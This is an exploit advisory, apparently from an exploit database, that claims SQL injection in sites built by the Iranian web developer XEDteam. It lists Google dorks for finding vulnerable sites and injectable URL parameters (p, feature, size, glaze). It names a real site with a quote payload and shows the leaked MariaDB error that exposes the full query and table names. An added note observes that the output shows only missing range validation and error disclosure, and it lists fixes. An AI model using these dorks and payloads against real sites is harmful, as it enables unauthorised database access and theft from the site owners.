#################################################################################################
# Exploit Title : Powered By XEDteam طراحی و توسعه: گروه زد Iran SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 28/09/2018
# Vendor Homepage : xedteam.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''Powered By: XEDteam.''
intext:''طراحی و توسعه: گروه زد.''
inurl:''/index_fa.php'' Powered By: XEDteam.
# Exploit ( [SQL Injection] marks the affected query parameter in each request : p, feature, size, glaze ) :
/index_fa.php?option=product&task=list&p=[SQL Injection]
/index_fa.php?option=product&task=list&p=-[ID-NUMBER]
&brand=&name=&feature=[SQL Injection]
/index_fa.php?option=product&task=list&p=-[ID-NUMBER]
&brand=&name=&feature=[ID-NUMBER]&type=&size=[SQL Injection]
/index_fa.php?option=product&task=list&p=-[ID-NUMBER]
&brand=&name=&feature=[ID-NUMBER]&type=&size=[ID-NUMBER]&print_type=&glaze=[SQL Injection]
#################################################################################################
# Example Site =>
amintile.ir/index_fa.php?option=product&task=list&p=-1%27 => [ Proof of Concept ] => archive.is/v2AUm
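# SQL Database Error ( MariaDB error and full query text returned to the client ) =>
# Note : the syntax error is raised at the LIMIT clause, whose offset is negative ( -15 ), and the quote sent in p does not
# appear in the echoed query. As shown, the output establishes missing range validation of p and verbose error disclosure;
# it does not by itself show request text reaching the statement. Handling p as a positive integer, binding all
# parameters, and suppressing database errors in responses address what is visible here.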
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
right syntax to use near \'-15, 15\' at line 16 SQL=SELECT p.id, IF(gn.value = \'\' OR gn.value IS NULL, n.value, gn.value)
AS name, p.group_id, g.value AS glaze, p.image,\n GROUP_CONCAT(DISTINCT s.width, \'x\', s.height) AS size, p.image,
p.layout,\n pt.value AS print_type\n FROM smb_product AS p\n LEFT JOIN smb_translation AS n ON n.object = p.id AND
n.type = \'product_name\' AND n.language = \'fa\'\n LEFT JOIN smb_translation AS gn ON gn.object = p.id AND gn.type =
\'product_group_name\' AND gn.language = \'fa\'\n LEFT JOIN smb_translation AS g ON g.object = p.glaze_id AND g.type =
\'glaze_name\' AND g.language = \'fa\'\n LEFT JOIN smb_translation AS pt ON pt.object = p.print_type_id AND pt.type =
\'print_type_name\' AND pt.language = \'fa\'\n LEFT JOIN smb_product AS pg ON pg.group_id = p.id AND pg.group_id !=
0\n LEFT JOIN smb_product_sizes AS sz ON sz.product = p.id OR (pg.id IS NOT NULL AND sz.product = pg.id)\n
LEFT JOIN smb_product_size AS s ON s.id = sz.size\n LEFT JOIN smb_product_features AS f ON f.product = p.id\n
WHERE 1=1 AND (p.group_id = 0 OR p.group_id = p.id)\n GROUP BY p.id\n ORDER BY p.ordering\n LIMIT -15, 15
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################